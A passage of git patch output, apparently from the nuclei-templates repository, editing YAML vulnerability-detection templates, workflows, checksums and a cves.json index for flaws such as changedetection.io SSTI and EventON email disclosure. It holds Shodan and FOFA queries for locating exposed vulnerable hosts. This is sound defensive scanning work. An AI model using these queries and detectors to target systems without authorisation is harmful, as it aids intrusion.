cvss-score: 10 + cve-id: CVE-2024-32651 + cwe-id: CWE-1336 + tags: cve,cve2024,changedetection,ssti,rce + +requests: + - method: GET + redirects: true + max-redirects: 5 + path: + - "{{BaseURL}}/" + + extractors: + - type: xpath + name: version + internal: true + xpath: + - "//*[@id=\"right-sticky\"]" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Change Detection" + condition: and + + - type: dsl + dsl: + - compare_versions(version, '<= 0.45.20') \ No newline at end of file From 2a72d984c9ae10a84278c22eba2d1217245c1d73 Mon Sep 17 00:00:00 2001 From: edoardottt <edoardott@gmail.com> Date: Mon, 29 Apr 2024 16:41:50 +0200 Subject: [PATCH 0416/1768] Add CVE-2024-32651 --- http/cves/2024/CVE-2024-32651.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 41be5c7260..46da0f5d44 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -5,8 +5,7 @@ info: author: edoardottt severity: critical description: | - A Server Side Template Injection in changedetection.io - caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host. + A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32651 - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 @@ -45,4 +44,4 @@ requests: - type: dsl dsl: - - compare_versions(version, '<= 0.45.20') \ No newline at end of file + - compare_versions(version, '<= 0.45.20') From 5aa37ad0622d1786538a8f210e4eaee89661b69c Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 29 Apr 2024 22:59:34 +0330 Subject: [PATCH 0417/1768] Update ms-exchange-web-service.yaml --- http/exposed-panels/ms-exchange-web-service.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index be34eb8a95..9dbecbb86c 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -2,7 +2,7 @@ id: ms-exchange-web-service info: name: Microsoft Exchange Web Service - Detect - author: bhutch + author: bhutch, userdehghani severity: info description: | Microsoft Exchange Web Services was detected. @@ -23,6 +23,7 @@ http: - method: GET path: - "{{BaseURL}}/EWS/Exchange.asmx" + - "{{BaseURL}}/owa/service.svc" matchers-condition: and matchers: @@ -34,9 +35,10 @@ http: - type: status status: - 401 + - 302 extractors: - type: kval kval: - x_owa_version -# digest: 490a0046304402206f5d9c0e0b23e4a8ae9d2f4b99f3688c2daef6cb59037899bfea6455bbcf654f0220058960e38002865396412449c4bd3a73c107d3ffbb32c56088b70801e6cbef79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f5d9c0e0b23e4a8ae9d2f4b99f3688c2daef6cb59037899bfea6455bbcf654f0220058960e38002865396412449c4bd3a73c107d3ffbb32c56088b70801e6cbef79:922c64590222798bb761d5b6d8e72950 From ca7c747ffb31594e3352fd6218e1225c59a57241 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Apr 2024 09:21:16 +0700 Subject: [PATCH 0418/1768] Rename titannit-web-ssrf.yaml to titannit-web-rce.yaml --- .../titan/{titannit-web-ssrf.yaml => titannit-web-rce.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/vulnerabilities/titan/{titannit-web-ssrf.yaml => titannit-web-rce.yaml} (99%) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-rce.yaml similarity index 99% rename from http/vulnerabilities/titan/titannit-web-ssrf.yaml rename to http/vulnerabilities/titan/titannit-web-rce.yaml index 987bc42cf4..0c8d633afe 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-rce.yaml @@ -34,4 +34,4 @@ http: part: body words: - "titan.css" -# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950 From 4ff953787038efc556549f87a789b83b0c2431c1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Apr 2024 10:29:30 +0700 Subject: [PATCH 0419/1768] Update vbulletin-workflow.yaml --- workflows/vbulletin-workflow.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index a171b61afd..bf6fe49f6a 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -9,6 +9,4 @@ workflows: matchers: - name: vbulletin subtemplates: - - template: http/cves/2019/CVE-2019-16759.yaml - - - template: http/cves/2020/CVE-2020-12720.yaml + - tags: umbraco From 69420afa9b93b3882efd056ed67db3bc559fb730 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Apr 2024 10:30:17 +0700 Subject: [PATCH 0420/1768] Update vbulletin-workflow.yaml --- workflows/vbulletin-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index bf6fe49f6a..d1e744acc4 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -9,4 +9,4 @@ workflows: matchers: - name: vbulletin subtemplates: - - tags: umbraco + - tags: vbulletin From 65a5abf8e498c76fd7a98d336ee5331d0356dfa0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Apr 2024 12:31:38 +0700 Subject: [PATCH 0421/1768] fix: typo splunk workflow --- workflows/splunk-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/splunk-workflow.yaml b/workflows/splunk-workflow.yaml index 430505def0..f0112f6188 100644 --- a/workflows/splunk-workflow.yaml +++ b/workflows/splunk-workflow.yaml @@ -1,9 +1,9 @@ id: splunk-workflow info: - name: Splink Security Checks + name: Splunk Security Checks author: daffainfo - description: A simple workflow that runs all Splink related nuclei templates on a given target. + description: A simple workflow that runs all Splunk related nuclei templates on a given target. workflows: - template: http/technologies/tech-detect.yaml matchers: From 634cfc2a6f722c496043b3bcf9926b2edd18ba0f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 30 Apr 2024 11:06:57 +0530 Subject: [PATCH 0422/1768] remove ssrf tag --- http/vulnerabilities/titan/titannit-web-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/titan/titannit-web-rce.yaml b/http/vulnerabilities/titan/titannit-web-rce.yaml index 0c8d633afe..ad5f64e6b1 100644 --- a/http/vulnerabilities/titan/titannit-web-rce.yaml +++ b/http/vulnerabilities/titan/titannit-web-rce.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 fofa-query: title="TitanNit Web Control" - tags: titanit,web-control,ssrf,oast,rce + tags: titanit,web-control,oast,rce http: - raw: From ce4ed2ec3dda53a1bfb2b1bfa1235029680f5fa0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 30 Apr 2024 11:09:13 +0530 Subject: [PATCH 0423/1768] remove spacing --- http/exposed-panels/ms-exchange-web-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index 9dbecbb86c..720fd04bff 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -2,7 +2,7 @@ id: ms-exchange-web-service info: name: Microsoft Exchange Web Service - Detect - author: bhutch, userdehghani + author: bhutch,userdehghani severity: info description: | Microsoft Exchange Web Services was detected. From cfbe83daba84f01ab1177cd549fb515ad9db3fbd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 11:20:00 +0530 Subject: [PATCH 0424/1768] updated matcher & info --- http/cves/2024/CVE-2024-0235.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 0f3fca8273..ce1fdd8023 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -1,7 +1,7 @@ id: CVE-2024-0235 info: - name: EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure + name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure author: princechaddha severity: medium description: | @@ -13,6 +13,7 @@ info: reference: - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-0235 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -27,8 +28,8 @@ info: framework: wordpress shodan-query: vuln:CVE-2023-2796 fofa-query: wp-content/plugins/eventon/ - publicwww-query: "wp-content/plugins/eventon/" - tags: cve,cve2024,wp,wordpress,unauth,exposure,eventon,wpscan + publicwww-query: "/wp-content/plugins/eventon/" + tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan http: - method: POST @@ -46,7 +47,8 @@ http: part: body words: - '@' - - '"status":' + - 'status":"good' + - 'value=' - '"content":' condition: and From 38feed1c4e8446a058900be6486686457e417bea Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 11:22:45 +0530 Subject: [PATCH 0425/1768] added header-matcher --- http/cves/2024/CVE-2024-24131.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 615e72c43e..34b58aaa60 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -1,14 +1,14 @@ id: CVE-2024-24131 info: - name: SuperWebMailer 9.31.0.01799 - Reflected Cross-Site Scripting + name: SuperWebMailer 9.31.0.01799 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-24131 - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-24131 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -18,9 +18,11 @@ info: epss-percentile: 0.15655 cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + shodan-query: title:"SuperWebMailer" vendor: superwebmailer product: superwebmailer - shodan-query: title:"SuperWebMailer" tags: cve,cve2024,superwebmailer,xss http: @@ -37,6 +39,11 @@ http: - "SuperWebMailerAPI" condition: and + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 From d0a085216e1e638b4f51193397121c2a2b787c45 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 05:53:11 +0000 Subject: [PATCH 0426/1768] Auto Generated New Template Addition List [Tue Apr 30 05:53:11 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e7b43099c7..43e99df060 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-4973.yaml +http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-32399.yaml From 83aa5a8af3aa20c8a2a4e98a89a5f9ff078584a2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 05:53:15 +0000 Subject: [PATCH 0427/1768] Auto Generated Templates Checksum [Tue Apr 30 05:53:15 UTC 2024] :robot: --- templates-checksum.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index db7bfd778f..ae2587e892 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -88,14 +88,14 @@ cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39 cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24 cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a -cloud/aws/vpc/nacl-open-inbound.yaml:a59856c3bf2fc447e5d445a29f86eecacb104fa5 -cloud/aws/vpc/nacl-outbound-restrict.yaml:21f7402fc9850fda7d772202b9642e80a04c5c51 -cloud/aws/vpc/nat-gateway-usage.yaml:f274063e1784291dc3a15351186c20e1ec690d26 -cloud/aws/vpc/unrestricted-admin-ports.yaml:3cc2ddd2a9d04778330c98ede0ee37aa88271385 -cloud/aws/vpc/vpc-endpoint-exposed.yaml:2a451c74b1c96ea8c3b7526ea1d97f86a0bb2a40 -cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:2c11caa8e828544889e4729cf0dcd29e8a455528 -cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e5475b15f330db99344cf6586e9c08bc445ae1a -cloud/aws/vpc/vpn-tunnel-down.yaml:cd033a2465fab6d1693d7b455a4e15914971ef42 +cloud/aws/vpc/nacl-open-inbound.yaml:4117d3d0d468f9b723f63cd36a964cd73f82e76f +cloud/aws/vpc/nacl-outbound-restrict.yaml:dccc34edf2429e53bef902b6979e52418b415c14 +cloud/aws/vpc/nat-gateway-usage.yaml:c292fbd2ca07a84b1c10d83cce119c2a024fb800 +cloud/aws/vpc/unrestricted-admin-ports.yaml:3364c4aaa26cd2252bab903ac561fd8eb2fd2314 +cloud/aws/vpc/vpc-endpoint-exposed.yaml:b5517ee9213554b46ac6ed3064f8e78adbab0108 +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:1ddc0bac11e1c8827ae10389e8fb35444f8a0a82 +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:962bdc88135be9ba9328fd7fd9ad52d26c1fed6b +cloud/aws/vpc/vpn-tunnel-down.yaml:427ec306b6366a932a6a2c0c0d6f45b8ebf850de cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a @@ -3213,6 +3213,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 +http/cves/2024/CVE-2024-0235.yaml:010abffda64977fb58c3fb594b564f12171d1c40 http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 @@ -8453,7 +8454,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9d3d424dfd56ed2deffd10f1dd20dc19a2dc14f5 +templates-checksum.txt:53fd62a047c9cc044de6df62e9cb652f87cfb071 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b9d87eba45020340b73df7e1cddc92dfe0a511e8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 30 Apr 2024 11:23:32 +0530 Subject: [PATCH 0428/1768] added stop at first match --- http/exposed-panels/ms-exchange-web-service.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index 720fd04bff..a0fa3590f3 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/EWS/Exchange.asmx" - "{{BaseURL}}/owa/service.svc" + stop-at-first-match: true matchers-condition: and matchers: - type: regex From 9d7ac9da300a126f888e61f170dcdb72b8016cb0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 05:53:20 +0000 Subject: [PATCH 0429/1768] Auto Generated cves.json [Tue Apr 30 05:53:20 UTC 2024] :robot: --- cves.json | 4 ++++ cves.json-checksum.txt | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 198e58c831..61f889e407 100644 --- a/cves.json +++ b/cves.json @@ -2013,6 +2013,7 @@ {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} {"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"} {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} +{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} {"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} @@ -2026,6 +2027,7 @@ {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} {"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"} {"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"} +{"ID":"CVE-2023-2227","Info":{"Name":"Modoboa \u003c 2.1.0 - Improper Authorization","Severity":"critical","Description":"Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-2227.yaml"} {"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"} {"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"} {"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} @@ -2317,6 +2319,7 @@ {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} +{"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} @@ -2324,6 +2327,7 @@ {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} {"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} +{"ID":"CVE-2024-1183","Info":{"Name":"Gradio - Server Side Request Forgery","Severity":"medium","Description":"An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the 